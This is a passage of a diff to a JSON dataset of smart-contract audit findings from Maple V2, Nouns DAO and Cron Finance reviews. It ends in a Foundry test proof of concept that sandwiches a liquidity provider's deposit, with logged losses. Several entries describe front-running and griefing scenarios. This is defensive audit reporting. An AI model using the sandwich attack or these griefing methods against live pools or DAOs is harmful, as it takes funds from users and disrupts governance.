In addition to the comments, there is the actual behavior of the preview functions. A commonly accepted interpreta- tion of the standard is that these preview functions should revert in the case of conditions such as protocolPaused, !active, !openToPublic totalAssets > liquidityCap etc. The argument basically states that the max functions should return 0 under such conditions and the preview functions should revert whenever the amount exceeds the max.", + "title": "Private keys are read from the .env environment variable in the deployment scripts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "It has been identified that the private key of privileged (PROPOSER_KEY and DEPLOYER_PRIVATE_KEY) accounts are read the environment variables within scripts. The deployer address is verified on Etherscan as Nouns DAO: Deployer. Additionally, since the proposal is made by the account that owns the PROPOSER_KEY, it can be assumed that the proposer owns at least some Nouns. ProposeENSReverseLookupConfigMain- ProposeDAOV3UpgradeMainnet.s.sol#L24, Given the privileged status of the deployer and the proposer, unauthorized access to this private key could have a negative impact in the reputation of the Nouns DAO. The present method of managing private keys, i.e., through environment variables, represents a potential security risk. This is due to the fact that any program or script with access to the process environment can read these variables. As mentioned in the Foundry documentation: This loads in the private key from our .env file. Note: you must be careful when exposing private keys in a .env file and loading them into programs. This is only recommended for use with non-privileged deployers or for local / test setups. For production setups please review the various wallet options that Foundry supports.", "labels": [ - "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Spearbit", + "Nouns", + "Severity: Low Risk DeployDAOV3NewContractsBase.s.sol#L53, DeployDAOV3DataContractsBase.s.sol#L21," ] }, { - "title": "Set domainEnd correctly in intermediate _advanceGlobalPaymentAccounting steps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "pay- ments[paymentWithEarliestDueDate].paymentDueDate, which is possibly zero if the last payment has just been accrued past. This is currently not an issue, because in this scenario domainEnd would never be used before it is set back to its correct value in _updateIssuanceParams. However, for increased readability, it is recommended to prevent this odd intermediate state from ever occurring. domainEnd function, set to is", + "title": "Objection period will be disabled after the update to V3 is completed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Nouns DAO V3 introduces a new functionality called objection-only period. This is a conditional voting period that gets activated upon a last-minute proposal swing from defeated to successful, affording against voters more reaction time. Only against votes will be possible during the objection period. After the proposals created in ProposeDAOV3UpgradeMainnet.s.sol and ProposeTimelockMigrationCleanup- Mainnet.s.sol are executed lastMinuteWindowInBlocks and objectionPeriodDurationInBlocks will still re- main set to 0. A new proposal will have to be created, passed and executed in the DAO that calls the _setLast- MinuteWindowInBlocks() and _setObjectionPeriodDurationInBlocks() functions to enable this functionality.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Replace hard-coded value with PRECISION constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The constant PRECISION is equal to 1e30. The hard-coded value 1e30 is used in the _queueNext- Payment function, which can be replaced by PRECISION.", + "title": "Potential risks from outdated OpenZeppelin dependencies in the Nouns DAO v3", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The OpenZeppelion libraries are being used throughout the Nouns DAO v3 codebase. These li- braries however, are locked at version 4.4.0, which is an outdated version that has some known vulnerabilities. Specifically: The SignatureChecker.isValidSignatureNow is not expected to revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't imple- ment EIP-1271 as expected. The contracts that may be affected are those that use SignatureChecker to check the validity of a signature and handle invalid signatures in a way other than reverting. The ERC165Checker.supportsInterface is designed to always successfully return a boolean, and under no circumstance revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't implement EIP-165 as expected, specifically if it returns a value other than 0 or 1. The contracts that may be affected are those that use ERC165Checker to check for support for an interface and then handle the lack of support in a way other than reverting. At present, these vulnerabilities do not appear to have an impact in the Nouns DAO codebase, as corresponding functions revert upon failure. Nevertheless, these vulnerabilities could potentially impact future versions of the codebase.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Use of floating pragma version", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Contracts should be deployed using a fixed pragma version. Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively.", + "title": "DAO withdraws forked ids from escrow without emphasizing total supply increase which contra- dicts the spec and can catch holders unaware", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Withdrawal original nouns with ids of the forked tokens from escrow after the successful fork is a material event for all original nouns holders as the adjusted total supply is increased as long as withdrawal recipient is not treasury. There were special considerations regarding Nouns withdrawal impact after the fork: For this reason we're considering a change to make sure transfers go through a new function that helps Nouners ,! understand the implication, e.g. by setting the function name to withdrawNounsAndGrowTotalSupply or something similar, as well as emitting events that indicate the new (and greater) total supply used ,! by the DAO. However, currently withdrawDAONounsFromEscrow() neither have a special name, nor mentions the increase of adjusted total supply when to != ds.timelock: NounsDAOV3Fork.sol#L160-L178 /** * @notice Withdraws nouns from the fork escrow after the fork has been executed * @dev Only the DAO can call this function * @param tokenIds the tokenIds to withdraw * @param to the address to send the nouns to */ function withdrawDAONounsFromEscrow( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, address to ) external { if (msg.sender != ds.admin) { revert AdminOnly(); } ds.forkEscrow.withdrawTokens(tokenIds, to); emit DAOWithdrawNounsFromEscrow(tokenIds, to); } Nouns holder might not understand the consequences of withdrawing the nouns from escrow and support such a proposal, while as of now it is approximately USD 65k loss per noun withdrawn cumulatively for current holders. The vulnerability scenario here is a holder supporting the proposal without understanding the consequences for supply, as no emphasis is made, and then suffers their share of loss as a result of its execution. Per low likelihood and impact setting the severity to be low.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "PoolManager has low-level shares computation logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The PoolManager has low-level shares computation logic that should ideally only be in the ERC4626 Pool to separate the concerns.", + "title": "USDC-paying proposals executing between ProposeDAOV3UpgradeMainnet and ProposeTimelockMi- grationCleanupMainnet will fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "As explained in one of the Known Issues, ProposeDAOV3UpgradeMainnet contains a proposal that transfers the ownership of PAYER_MAINNET and TOKEN_BUYER_MAINNET from timelockV1 to timelockV2. There could be older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet which assume timelockV1 ownership of these contracts. Older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet will fail.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Add additional checks to prevent refinancing/funding a closed loan", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "It's important that an already liquidated loan is not reused by refinancing or funding again as it would break a second liquidation when the second liquidator contract is deployed with the same arguments and salt.", + "title": "Zero value ERC-20 transfers can be performed on sending treasury funds to quitting member or forked DAO, denying the whole operation if one of erc20TokensToIncludeInQuit tokens doesn't allow this", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Some tokens do not allow for zero value transfers. Such behaviour do not violate ERC-20 standard, is not anyhow prohibited and can occur in any non-malicious token. As a somewhat well-known example Aave's LEND requires amount to be positive: etherscan.io/address/0x80fb784b7ed66730e8b1dbd9820afd29931aab03#code#L74 function transfer(address _to, uint256 _value) returns(bool) { require(balances[msg.sender] >= _value); require(balances[_to] + _value > balances[_to]); As stETH, which is currently used by Nouns treasury, is upgradable, it cannot be ruled out that it might be requiring the same in the future for any reason. etherscan.io/token/0xae7ab96520de3a18e5e111b5eaab095312d7fe84#code Zero value itself can occur in a situation when valid token was added to erc20TokensToIncludeInFork, but this token timelock balance is currently empty. NounsDAOLogicV1Fork's quit() and NounsDAOV3Fork's executeFork() and joinFork() will be unavailable in such scenario, i.e. the DAO forking workflow will be disabled. 37 Since the update of erc20TokensToIncludeInFork goes through proposal mechanics and major tokens rarely upgrade, while there is an additional requirement of empty balance, the cumulative probability of the scenario can be deemed quite low, while the core functionality blocking impact is high, so setting the severity to be low.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "PoolManager.removeLoanManager errors with out-of-bounds if loan manager not found", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The PoolManager.removeLoanManager errors with an out-of-bounds error if the loan manager is not found.", + "title": "A signer of multiple proposals will cause all of them except one to fail creation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Like proposers, signers are also allowed to back only one proposal at a time. As commented: \"This is a spam protection mechanism to limit the number of proposals each noun can back.\" However, unlike proposers who know which of their proposals are active and when, signers may not readily have that insight and can sign multiple proposals they may want to back. If more than one such proposal is proposed then only the first one will pass the checkNoActiveProp() for this signer and all the others will fail this check and thereby the proposal creation itself. A signer of multiple proposals will cause all of them except one to fail creation. Other proposals will have to then exclude such signatures and resubmit. This could be accidental or used by malicious signers for griefing proposal creations.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "PoolManager.removeLoanManager does not clear loanManagers mapping", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The PoolManager.removeLoanManager does not clear the reverse loanManagers[mapleLoan] = loanManager mapping.", + "title": "Single-step ownership change is risky", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The codebase primarily follows a two-step ownership change pattern. However, in specific sections, a single-step ownership change is utilized. Two-step ownership change is preferable, where: The current owner proposes a new address for the ownership change. In a separate transaction, the proposed new address can then claim the ownership.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Pool._requestRedeem reduces the wrong approval amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The requestRedeem function transfers escrowShares_ from owner but reduces the approval by shares_. Note that in the current code these values are the same but for future PoolManager upgrades this could change.", + "title": "No storage gaps for upgradeable contracts might lead to storage slot collision", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "When implementing upgradable contracts that inherit it is important that there are storage gaps, in case new storage variables are later added to the inherited contracts. If a storage gap variable isn't added, when the upgradable contract introduces new variables, it may override the variables in the inheriting contract. As noted in the OpenZeppelin Documentation: You may notice that every contract includes a state variable named __gap. This is empty reserved It allows us to freely add new state space in storage that is put in place in Upgrade Safe contracts. variables in the future without compromising the storage compatibility with existing deployments. It isnt safe to simply add a state variable because it \"shifts down\" all of the state variables below in the inheritance chain.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Issuance rate for double-late claims does not need to be updated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The previousRate_ for the 8c) case in claim is always zero because the payment (!onTimePayment_). The subtraction can be removed is late I'd suggest removing the subtraction here as it's confusing. The first payment's IR was reduced in _advanceGlob- alPaymentAccounting, the newly scheduled one that is also past due date never increased the IR.", + "title": "The version string is missing from the domain separator allowing submission of signatures in different protocol versions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The version string seems to be missing from the domain separator. According to EIP-712: Protocol designers only need to include the fields that make sense for their signing domain. Unused fields are left out of the struct type While it's not a mandatory field as per the EIP-712 standard, it would be sensible for the protocol to include the version string in the domain separator, considering that the contracts are upgradable. For instance, if a user generates a signature for version v1.0, they may not want the signature to remain valid following an upgrade.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Additional verification that paymentIdOf[loan_] is not 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Most functions in the loan manager use the value paymentIdOf[loan_] without first checking if it's the default value of 0. Anyone can pay off a loan at any time to cause the claim function to set paymentIdOf[loan_] to 0, so even the privileged functions could be front-run to call on a loan with paymentIdOf 0. This is not an issue in the current codebase because each function would revert for some other reasons, but it is recommended to add an explicit check so future upgrades on other modules don't make this into a more serious issue.", + "title": "Two/three forks in a row will force expiration of execution-awaiting proposals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Proposal execution on the original DAO is disallowed during the forking period. While the proposed fork period is currently 7 days, MAX_FORK_PERIOD is 14 days. GRACE_PERIOD, which is the time allowed for a queued proposal to execute, has been increased from the existing 14 days to 21 days specifically to account for the fork period. However, if there are three consecutive forks whose active fork periods add up to 21 days, or two forks in the worse case if the fork period is set to MAX_FORK_PERIOD then all queued proposals will expire and cannot be executed. Malicious griefing forkers can collude to time and break-up their voting power to fork consecutively to prevent execution of queued proposal on the original DAO, thus forcing them to expire.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "LoanManager redundant check on late payment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "block.timestamp <= nextPaymentDueDate_ in one of the if statements. The payment is already known to be late at this point in the code, so block.timestamp > previousPaymentDueDate_ is always true.", + "title": "Withdrawing from fork escrow can be front-run to prevent withdrawal and force join the fork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "withdrawFromForkEscrow() is meant to allow a fork escrowed holder change their mind about join- ing the fork by withdrawing their escrowed tokens. However, the current design allows another fork joining holder to front-run a withdrawFromForkEscrow() transaction with their escrowToFork() to exceed the fork threshold and also call executeFork() with it (if the threshold was already met then this doesn't even have to be another fork joining holder). This will cause withdrawFromForkEscrow() to fail because the fork period is now active and that holder is forced to join the fork with their previously escrowed tokens. Scenario: Alice and Bob decide to create/join a fork with their 10 & 15 tokens respectively to meet the 20% fork threshold (assume 100 Nouns). Alice escrows first but then changes her mind and calls withdrawFromForkE- scrow(). Bob observes this transaction (assume no private mempool) and front-runs it with his escrowToFork() + executeFork(). This forces Alice to join the fork instead of staying back. withdrawFromForkEscrow() does not always succeed and is likely effective only in the early stages of escrow period but not towards the end when the fork threshold is almost met. Late fork escrowers do not have as much an opportunity as others to change their mind about joining the fork.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Add encodeArguments/decodeArguments to WithdrawalManagerInitializer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Unlike the other Initializers, the WithdrawalManagerInitializer.sol does not have public en- codeArguments/decodeArguments functions, and PoolDeployer need to be changed to use these functions cor- rectly", + "title": "A malicious proposer can replay signatures to create duplicate proposals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Suppose Bob and Alice sign a proposal for Carl, authorizing a transfer of exactly 100,000 USDC to a specified address (xyz) and their signatures were created with a long expiration time. Following the normal procedure, Carl creates the proposal, the vote is held, and the proposal enters the 'succeeded' state. However, since Bob and Alice's signatures are still valid due to the long expiration time, Carl could reuse these signatures to create another proposal for an additional transfer of 100,000 USDC to the same xyz address, as long as Bob and Alice still retain their voting power/nouns. Thus, Carl could double the intended transfer amount without their explicit authorization. While it is true that Bob and Alice can intervene by either cancelling the new proposal or invalidating their signatures before the creation of the second proposal, it necessitates them to take action, which may not always be feasible or timely.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Reorder WM.processExit parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "All other WM and Pool function signatures start with (uint256 shares/assets, address owner) parameters but the WM.processExit has its parameters reversed (address, uint256).", + "title": "Potential re-minting of previously burnt NounsTokenFork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "In the current implementation of the NounsTokenFork contract, there is a potential vulnerability that allows for a previously burned NounsTokenFork to be re-minted. This risk occurs due to the user retaining the status of escrow.ownerOfEscrowedToken(forkId, nounId) even after the claimFromEscrow() function call. Presently, no tokens are burned outside of the NounsAuctionHouseFork and are only burned in the case that no bids are placed for that nounId. However, this issue could become exploitable under the following circumstances: 1. If a new burn() functionality is added elsewhere in the code. 2. If a new contract is granted the Minter role. 3. If the NounsAuctionHouseFork is updated to a malicious implementation. Additionally, exploiting this potential issue would lead to the remainingTokensToClaim variable decreasing, caus- ing it to underflow (<0). In this situation, some legitimate users would be unable to claim their tokens due to this underflow.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Additional verification in MapleLoanInitializer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The MapleLoanInitializer could verify additional arguments to avoid bad pool deployments.", + "title": "A single invalid/expired/cancelled signature will prevent the creation and updation of proposals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "For proposals created via proposeBySigs() or updated via updateProposalBySigs(), if the pro- poser includes even a single invalid/expired/cancelled signature (without performing offchain checks to prevent this scenario), verifyProposalSignature() will revert and the creation/updation of proposals will fail. NounsDAOV3Proposals.sol#L815 Nouns- A proposer accidentally including one or more invalid/expired/cancelled signatures submitted accidentally by a signer will cause the proposal creation/updation to fail, lose gas used and will have to resubmit after checking and excluding such signatures. This also allows griefing by signers who intentionally submit an invalid/expired signature or a valid one which is later cancelled (using cancelSig()) just before the proposal is created/updated. Note that while the signers currently have cancellation powers which gives them a greater griefing opportunity even at later proposal states, that has been reported separately in a different issue.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk NounsDAOV3Proposals.sol#L956-L962" ] }, { - "title": "Clean up updatePlatformServiceFee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The updatePlatformServiceFee can be cleaned up to use an existing helper function", + "title": "Missing require checks in NounsDAOV3Proposals.execute() and executeOnTimelockV1() functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The following require checks are missing: FunctionNounsDAOV3Proposals.execute(): require(proposal.executeOnTimelockV1 == false, 'NounsDAO::execute: executeOnTimelockV1 = true'); Function NounsDAOV3Proposals.executeOnTimelockV1(): require(proposal.executeOnTimelockV1 == true, 'NounsDAO::executeOnTimelockV1: executeOnTimelockV1 = ,! false'); Due to the absence of these require checks, the NounsDAOLogicV3 contract leaves open a vulnerability where if two identical proposals, with the exact same transactions, are concurrently queued in both the timelockV1 and timelock contracts, the proposal originally intended for execution on timelock can be executed on timelockV1 and vice versa. The consequence of this scenario is that it essentially blocks or causes a Denial of Service to the legitimate execution path of the corresponding proposal for either timelockV1 or timelock. This occurs because each proposal has been inadvertently executed on the unintended timelock contract due to the lack of a condition check that would otherwise ensure the correct execution path.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Document restrictions on Refinancer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The refinancer may not set unexpected storage slots, like changing the _fundsAsset because _- drawableFunds, _refinanceInterest are still measured in the old fund's asset.", + "title": "Due to misaligned DAO and Executors logic any proposal will be blocked from execution at 'eta + GRACE_PERIOD' timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "There is an inconsistency in treatment of the eta + GRACE_PERIOD moment of time in the proposal lifecycle: any proposal is executable in timelock at this timestamp, but have expired status in the DAO logic. Both Executors do allow the executions when block.timestamp == eta + GRACE_PERIOD: The NounsDAOExecutor:executeTransaction() function: 43 function executeTransaction( address target, uint256 value, string memory signature, bytes memory data, uint256 eta ) public returns (bytes memory) { ... require( getBlockTimestamp() >= eta, \"NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock.\" ); require( getBlockTimestamp() <= eta + GRACE_PERIOD, 'NounsDAOExecutor::executeTransaction: Transaction is stale.' ); The NounsDAOExecutorV2:executeTransaction() function: function executeTransaction( address target, uint256 value, string memory signature, bytes memory data, uint256 eta ) public returns (bytes memory) { ... require( getBlockTimestamp() >= eta, \"NounsDAOExecutor::executeTransaction: Transaction hasn't surpassed time lock.\" ); require( getBlockTimestamp() <= eta + GRACE_PERIOD, 'NounsDAOExecutor::executeTransaction: Transaction is stale.' ); While all (V1,2, 3, and V1Fork) DAO state functions produce the expired state. The NounsDAOLogicV2:state() function: function state(uint256 proposalId) public view returns (ProposalState) { require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); Proposal storage proposal = _proposals[proposalId]; if (proposal.vetoed) { return ProposalState.Vetoed; } else if (proposal.canceled) { return ProposalState.Canceled; } else if (block.number <= proposal.startBlock) { return ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return ProposalState.Active; } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < ,! quorumVotes(proposal.id)) { return ProposalState.Defeated; } else if (proposal.eta == 0) { return ProposalState.Succeeded; } else if (proposal.executed) { return ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; 44 The NounsDAOV3Proposals:stateInternal() function: function stateInternal(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) internal view returns (NounsDAOStorageV3.ProposalState) { require(ds.proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId]; if (proposal.vetoed) { return NounsDAOStorageV3.ProposalState.Vetoed; } else if (proposal.canceled) { return NounsDAOStorageV3.ProposalState.Canceled; } else if (block.number <= proposal.updatePeriodEndBlock) { return NounsDAOStorageV3.ProposalState.Updatable; } else if (block.number <= proposal.startBlock) { return NounsDAOStorageV3.ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return NounsDAOStorageV3.ProposalState.Active; } else if (block.number <= proposal.objectionPeriodEndBlock) { return NounsDAOStorageV3.ProposalState.ObjectionPeriod; } else if (isDefeated(ds, proposal)) { return NounsDAOStorageV3.ProposalState.Defeated; } else if (proposal.eta == 0) { return NounsDAOStorageV3.ProposalState.Succeeded; } else if (proposal.executed) { return NounsDAOStorageV3.ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + getProposalTimelock(ds, proposal).GRACE_PERIOD()) { return NounsDAOStorageV3.ProposalState.Expired; The NounsDAOLogicV1Fork:state() function: function state(uint256 proposalId) public view returns (ProposalState) { require(proposalCount >= proposalId, 'NounsDAO::state: invalid proposal id'); Proposal storage proposal = _proposals[proposalId]; if (proposal.canceled) { return ProposalState.Canceled; } else if (block.number <= proposal.startBlock) { return ProposalState.Pending; } else if (block.number <= proposal.endBlock) { return ProposalState.Active; } else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < ,! proposal.quorumVotes) { return ProposalState.Defeated; } else if (proposal.eta == 0) { return ProposalState.Succeeded; } else if (proposal.executed) { return ProposalState.Executed; >> } else if (block.timestamp >= proposal.eta + timelock.GRACE_PERIOD()) { return ProposalState.Expired; Impact: Since both timelocks require sender to be admin, forced to be expired when execution call proposal).GRACE_PERIOD(). the valid proposal will be blocked from execution and time happens to be proposal.eta + getProposalTimelock(ds, The probability of this exact timestamp to be reached is low, while the impact of successful proposal to be rendered invalid by itself is high. However, since there is enough time prior to that moment both for cancellation and execution and all these actions come through permissioned workflow the impact is better described as medium, so per low probability and medium impact setting the severity to be low. 45", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Typos / Incorrect documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The code and comments contain typos or are sometimes incorrect.", + "title": "A malicious DAO can increase the odds of proposal defeat by setting a very high value of last- MinuteWindowInBlocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The goal of objection-only period, as documented, is to protect the DAO from executing proposals, that the majority would not want to execute. However, a malicious majority can abuse this feature by setting a very high value of lastMinuteWindowInBlocks (setter does not enforce max threshold), i.e. something very close to the voting period, to increase the probability of triggering objection-only period. If votingPeriod = 2 weeks and a governance proposal somehow passed to set lastMin- Example scenario: uteWindowInBlocks to a value very close to 100800 blocks i.e. ~2 weeks, then every proposal may end up with an objection-only period. Impact: Every proposal may end up with an objection-only period which may not be required/expected. Low likelihood + Low impact = Low severity. 46", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Balancer Read-Only Reentrancy Vulnerability (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Balancer's read-only reentrancy vulnerability potentially effects the following Cron-Fi TWAMM func- tions: getVirtualReserves getVirtualPriceOracle executeVirtualOrdersToBlock A mitigation was provided by the Balancer team that uses a minimum amount of gas to trigger a reentrancy check. The Balancer vulnerability is discussed in greater detail here: reentrancy-vulnerability-scope-expanded/4345", + "title": "Use custom errors instead of revert strings and remove pre-existing unused custom errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "String errors are added to the bytecode which make deployment cost more expenseive. It is also difficult to use dynamic information in them. Custom errors are more convenient and gas-efficient. There are several cases across the codebase where long string errors are still used over custom errors. As an example, in NounsDAOLogicV1Fork.sol#L680, the check reverts with a string: require(msg.sender == admin, 'NounsDAO::_setQuorumVotesBPS: admin only'); In this case, the AdminOnly() custom error can be used here to save gas. This also occur in other parts of this contract as well as the codebase. Also, some custom errors were defined but not used. See NounTokenFork.sol#L40, NounTokenFork.sol#L43", "labels": [ "Spearbit", - "CronFinance", - "Severity: High Risk" + "Nouns", + "Severity: Gas Optimization" ] }, { - "title": "Overpayment of one side of LP Pair onJoinPool due to sandwich or user error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Only one of the two incoming tokens are used to determine the amount of pool tokens minted (amountLP) on join amountLP = Math.min( _token0InU112.mul(supplyLP).divDown(_token0ReserveU112), _token1InU112.mul(supplyLP).divDown(_token1ReserveU112) ); In the event the price moves between the time a minter sends their transaction and when it is included in a block, they may overpay for one of _token0InU112 or _token1InU112. This can occur due to user error, or due to being sandwiched. Concrete example: pragma solidity ^0.7.0; pragma experimental ABIEncoderV2; import \"forge-std/Test.sol\"; import \"../HelperContract.sol\"; import { C } from \"../../Constants.sol\"; import { ExecVirtualOrdersMem } from \"../../Structs.sol\"; contract JoinSandwich is HelperContract { uint256 WAD = 10**18; function testManualJoinSandwich() public { 5 address userA = address(this); address userB = vm.addr(1323); // Add some base liquidity from the future attacker. addLiquidity(pool, userA, userA, 10**7 * WAD, 10**7 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userA), 10**7 * WAD - C.MINIMUM_LIQUIDITY); // Give userB some tokens to LP with. token0.transfer(userB, 1_000_000 * WAD); token1.transfer(userB, 1_000_000 * WAD); addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userB), 10**6 * WAD); exit(10**6 * WAD, ICronV1Pool.ExitType(0), pool, userB); assertEq(CronV1Pool(pool).balanceOf(userB), 0); // Full amounts are returned b/c the exit penalty has been removed (as is being done anyway). assertEq(token0.balanceOf(userB), 1_000_000 * WAD); assertEq(token1.balanceOf(userB), 1_000_000 * WAD); // Now we'll do the same thing, simulating a sandwich from userA. uint256 swapProceeds = swapPoolAddr(5 * 10**6 * WAD, /* unused */ 0, ICronV1Pool.SwapType(0), address(token0), pool, ,! userA); // Original tx from userB is sandwiched now... addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); // Sell back what was gained from the first swap. swapProceeds = swapPoolAddr(swapProceeds, /* unused */ 0, ICronV1Pool.SwapType(0), address(token1), pool, userA); emit log_named_uint(\"swapProceeds 1 to 0\", swapProceeds); // allows seeing what userA lost to fees // Let's see what poor userB gets back of their million token0 and million token1... assertEq(token0.balanceOf(userB), 0); assertEq(token1.balanceOf(userB), 0); exit(ICronV1Pool(pool).balanceOf(userB), ICronV1Pool.ExitType(0), pool, userB); emit log_named_uint(\"userB token0 after\", token0.balanceOf(userB)); emit log_named_uint(\"userB token1 after\", token1.balanceOf(userB)); } } Output: Logs: swapProceeds 1 to 0: 4845178856516554015932796 userB token0 after: 697176321467715374004199 userB token1 after: 687499999999999999999999 1. We have a pool where the attacker is all of the liquidity (107 of each token) 2. A LP tries to deposit another 106 in equal proportions 3. The attacker uses a swap of 5 (cid:3) 106 of one of the tokens to distort the pool. They lose about 155k in the process, but the LP loses far more, nearly all of which goes to the attacker--about 615,324 (sum of the losses of the two tokens since they're equally priced in this example). The 